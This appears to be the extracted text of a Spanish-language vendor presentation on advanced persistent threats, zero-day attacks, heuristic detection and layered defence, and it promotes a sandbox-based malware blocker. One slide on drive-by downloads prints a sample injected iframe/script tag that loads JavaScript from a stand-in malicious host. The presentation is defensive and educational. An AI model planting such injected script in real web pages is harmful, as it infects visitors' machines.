Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su empresa.
1. La confianza es la mejor conexión
La confianza es la mejor conexión
2. La confianza es la mejor conexión
Conectividad:
Internet Empresarial.
Red Privada de Datos.
Enlaces de Alta Capacidad.
Fibra Oscura.
Soluciones Integradas:
Internet Seguro Administrado.
Internet con Video Vigilancia.
Video Conferencia por Internet
y más.
Seguridad Informática:
Antivirus.
Firewalls XTM.
WAF/IPS
Seguridad para E-mail, la Web
y prevención contra la fuga de
información.
Video IP:
Cámaras IP de Vigilancia.
Video Conferencia.
Redes LAN:
Redes de Cableado
Estructurado.
Redes Inalámbricas.
Fibra Óptica.
SwitchesCore y de Borde.
UPS.
Certificación de Redes.
Análisis de Desempeño.
Reparación y Reordenamiento
de Redes.
Correo Electrónico y
colaboración móvil:
E-mail, contactos, agenda, calendario
compartido y sincronización móvil.
Colaboración multiplataforma,
sincronización móvil inalámbrica,
robusta seguridad y archivado de
copia de seguridad automatizada.
Soluciones
IBW
3. La confianza es la mejor conexión
• Conceptos de Ataques
• Mercadeo de Amenazas
• Que es Apt
• Historia del Apt
• Ataques al SMB
• Estrategia de defensa en
Profundidad.
• APT Blocker
• Deteccion mediante análisis
de trafico.
TEMARIO
5. La confianza es la mejor conexión
Que es una Vulnerabilidad y Exploit
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar
algún método para explotarla.
Un exploit es aquel proceso o software que ataca una vulnerabilidad particular
de un sistema o aplicación.
7. La confianza es la mejor conexión
Ataque de Dia Cero
Ventana de Vulnerabilidad
8. La confianza es la mejor conexión
Que es Un Sand Box Y Un HoneyPot?
9. La confianza es la mejor conexión
HEURISTICA = PROTECCION DIA ZERO
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.
10. La confianza es la mejor conexión
HEURISTICA PASIVA
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de
subrutinas,o llamadas de
programas que indiquen
comportamiento malicioso.
11. La confianza es la mejor conexión
HEURISTICA ACTIVA
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo
12. La confianza es la mejor conexión
METODO DE INFECCION DRIVE
BY DOWNLOAD
DBDB
Parte 1: Ataque automatizado SQL ,HTML InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe> OR IFRAME
13. La confianza es la mejor conexión
Mercado de Vulnerabilidades
IDEFENSE SECURITY
INTELLIGENCE SERVICES
14. La confianza es la mejor conexión
Valor de la Botnet en el mercado
lPrecio por maquina Zombie $.10 a $1 en el Rango de 10,000 PC
lPrecio Unitario por PC $100
lEl precio de credenciales y tarjetas de crédito se vende por aparte.
lRenta de una Botnet para DOS $200 /día . 10 K zombies.
lLA botnet Zeus a sido rentada por $500 /día 12k-
l
15. La confianza es la mejor conexión
Que son las APT
Advanced Persistant Threat
(APT) Malware de alta tecnología
diseñado para ser sigiloso y
mantener el control de un sistema
16. La confianza es la mejor conexión
Línea de tiempo de las Amenazas
GhostNet
Operation
Aurora
Stuxnet
RSA/Lockheed
Duqu
Flame
Gauss
NYTimes
Adobe
Target
Mar.
2009
Jan.
2010
Jun.
2010
Mar.
2011
Sep.2
011 May
2012
Dec.
2013
Jun.
2012
Jan.
2013
2009 2010 2011 2012 2013 2014
Oct.
2013
China-based
C&C
Spear Phishing
Political Targets
IE 0day
Comment Crew
(CN)
Stole Gmail and
Src
Four 0day
PLC Rootkit
Broke
Centrifuges
0day Flash Flaw
0dayTrojan
Stole SecureID
Info
0day Word flaw
Iran, Sudan,
Syrian
Cyber
Espionage
0day MS Cert
Flaw
Stole IP
Target Iranian
Oil
Targeted
Lebanon
USB LNK Flaw
APT Bank Trojan
152M records
0day
Coldfusion
Stolen source
China-based
Spear
phishing
0day
malware
40M CCNs
0day
malware
Partner
access
Nacion-Estado / Politica Criminales / Privadas
19. La confianza es la mejor conexión
Las Técnicas de APT ahora atacan el
SMB
Zeus copia los ataques Stuxnet 0 day
Criminales usan 0day malware (Cryptolocker)
Zeus usa Certificados Robados
Criminales spear phishing
Criminales con Ataques watering hole
Ahora, los criminals del malware
exploits las mismas tacticas
avanzadas que los que Ataque de
Estado. Cada organizacion esta en
riesgo de los APT!
20. La confianza es la mejor conexión
HERRAMIENTAS COMERCIALES
PARA HACKING Y PHISHING
21. La confianza es la mejor conexión
Software Evasión Dinámica
• Dynamic Evasion
• Checks for Environment
• Tool Kits Available for Download
Defeats sandbox and
virtual machines
Fireware 11.9
22. La confianza es la mejor conexión
PORQUE ATACAR LA SMB
GRAN EMPRESA $$$$
SMB $
23. La confianza es la mejor conexión
“ MENOS DEL 1% DE LOS EMPLEADOS MANTIENEN CONDUCTAS
MALICIOSAS O TRATAN DE ATACAR LA EMPRESA.PERO EL 100% DE LOS
EMPLEADOS PUEDEN SER COMPROMETIDOS SIN DARSE CUENTA
PARA ATACAR LA EMPRESA”
¨”El Hacker puede aprovechar cualquier info de las Redes Sociales”
24. La confianza es la mejor conexión
CARACTERISTICAS PRINCIPALES
DE UN APT
24
• Amenaza dedicada a blanco especifico
• Utiliza técnicas sofisticadas
• Comunicaciones Cifradas.
• Se puede transmitir USB
• Usa Puertos 80,443,53
• Ingeniería social
• Vulnerabilidades de día cero
• Certificados fraudulentos
• Mando y Control Centralizado
• Sin ser detectados durante períodos
prolongados
• Enmascaramiento exfiltración
25. La confianza es la mejor conexión
Fuentes Generadoras de APT
26. La confianza es la mejor conexión
Estrategia de defensa en Profundidad
Algunas alternativas incluyen la mitigacion
del riesgo basados en capas de seguridad
y control de Parches;
Las Apt y los Ataques de dia Cero pueden
Sobrepasar las capas.
Administraciòn de Parches
Control de vulnerabilidades Proactivo
Control de Aplicaciones Y
Proxys
Control Gris
Control Dispositivos
Y navegación
Control del flujo
AV/IPs
Control Conocido
Cifrado de media y Disco
Control de Datos
27. La confianza es la mejor conexión
Efectividad del AV e IPs?
Pros:
• Detiene “background noise” malware
• Puede detectar código reutilizado ( baja
probabilidad )
• Podria detener payloads despues de ser
descubiertos
Cons:
• No es una defense Proactiva ante las APT
• Evade la Euristica mediante encripció y
enmascaramiento de operaciones en
tiempo.
• La Heuristica Dinámica es de alto
desempeño y baja tasa de detecciòn.
Av/ips
Control the Known
28. La confianza es la mejor conexión
Efectividad Device Control Y Navegacion
(Control WEB y Reputación)
Device Control y
Navegacion
Control the Flow
Pros:
• Puede evitar que los dispositivos no autorizados o las
descargas inyectan malware.
• Puede parar determinados tipos de archivos se copien
en máquinas host
• Método preventivo.
Cons:
• Siempre hay un host que esta expuesto por excepción
de políticas Ataque lateral.
29. La confianza es la mejor conexión
Efectividad del cifrado?
Cifrado de Media y Disco Duro
Control the Data
Pros:
• Hace adquisición de datos lateral más difícil
• Una buena capa de protección de datos fuera de la
APT
Cons:
• Generalmente no protegerá los datos si el punto final
se ve comprometida a nivel de sistema
30. La confianza es la mejor conexión
Efectividad del Control de Aplicaciones y Proxys
Control de Aplicaciones y
Proxys DPI
Control the Grey
Pros:
• Extremadamente eficaz contra los ataques de día cero
• Detiene desconocidos , cargas útiles de malware
dirigidos
• Impacto bajo rendimiento en los puntos finales
Cons:
• A medida que la flexibilidad de las política se
incrementa deja de ser efectivo.
• No detiene inyecciones en memoria ( ataques que no
escapan a la memoria de servicio)
31. La confianza es la mejor conexión
Efectividad de Administración Parches
Administracion de Parches
Control the Vulnerability Landscape
Pros:
• Elimina la superficie atacable que los hackers pueden
dirigir
• Configuración central de cortafuegos de escritorio
nativas
• Mejora el rendimiento de punto final y la estabilidad
• Se puede activar la protección de la inyección de
memoria nativa
Cons:
• No detiene ataques de día Cero
32. La confianza es la mejor conexión
Curva de Ataques de Dia Cero
AV/IPS OS / ApplicationSandBox
Malware And
Virus Detection
33. La confianza es la mejor conexión
APT Blocker
Best of Breed Partner - Lastline
Fundada en 2011
Dir Redwood City, CA
8 años de investigación.
Fireware 11.9
• Emulador de codigo mediante sandbox
en la Nube.
• Emulacion de Sistema incluyendo
actividad de Hardware
• Detecta malware Dia 0
• Inspecciona Millones de codigo en un
instante
• Puede detector técnicas de Evasion
34. La confianza es la mejor conexión
Malware (R)evolution
Simple Threats
OpportunisticAttacks
APT
Solutions
Antivirus
Solutions
TargetedAttacks
Packing
Sophisticated Threats
Plain
Virus
Poly-
morphic
C&C
Fluxing
Persistent
Threats
Evasive
Threats
Fireware 11.9
35. La confianza es la mejor conexión
APT Blocker – Analisis de Malware en HD
Ejecución y emulación de código
Instrucciones de CPU Individuales
Memory accesses
System calls
Detección de Evasion
Provee granularidad y precisión que excede
A la competencia
Fireware 11.9
36. La confianza es la mejor conexión
Windows XP and Windows 7
• All Windows Executable Files
• MS Word
• Excel
• PowerPoint
• PDF
Android
• APK
APT Blocker
Fireware 11.9
37. La confianza es la mejor conexión
APTBlock
er
Cache
Local
“Cache”
Remoto
Carga
Archivo
APT Blocker Fireware 11.9
38. La confianza es la mejor conexión
WatchGuard Dimension Visibilidad
38
Advanced Malware in
Security Dashboard
Fireware 11.9
39. La confianza es la mejor conexión
Reports in WatchGuard Dimension
39
Fireware 11.9
40. La confianza es la mejor conexión
Visibility Explains Why This Is Malware
40
Drill down to find why the
activity is determined to
be malware
Fireware 11.9
41. La confianza es la mejor conexión
Security Dashboard
• Blocked Clients
• Blocked Destinations
• Blocked URL Categories
• Blocked Applications
• Blocked Protocols
• Blocked Intrusions
• Blocked Viruses
43. La confianza es la mejor conexión
“Más del 95% de las vulnerabilidades de los firewall son
causadas por mala configuración de los mismos, no por
defectos de los equipos”
-Gartner, 2011
44. La confianza es la mejor conexión
RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad y control de acceso.
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Escaneo de Https
• Uso de diferentes capas de seguridad que cierren el vector de ataque.
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras.
• Tener Herramientas de visibilidad y correlación de trafico en forma grafica.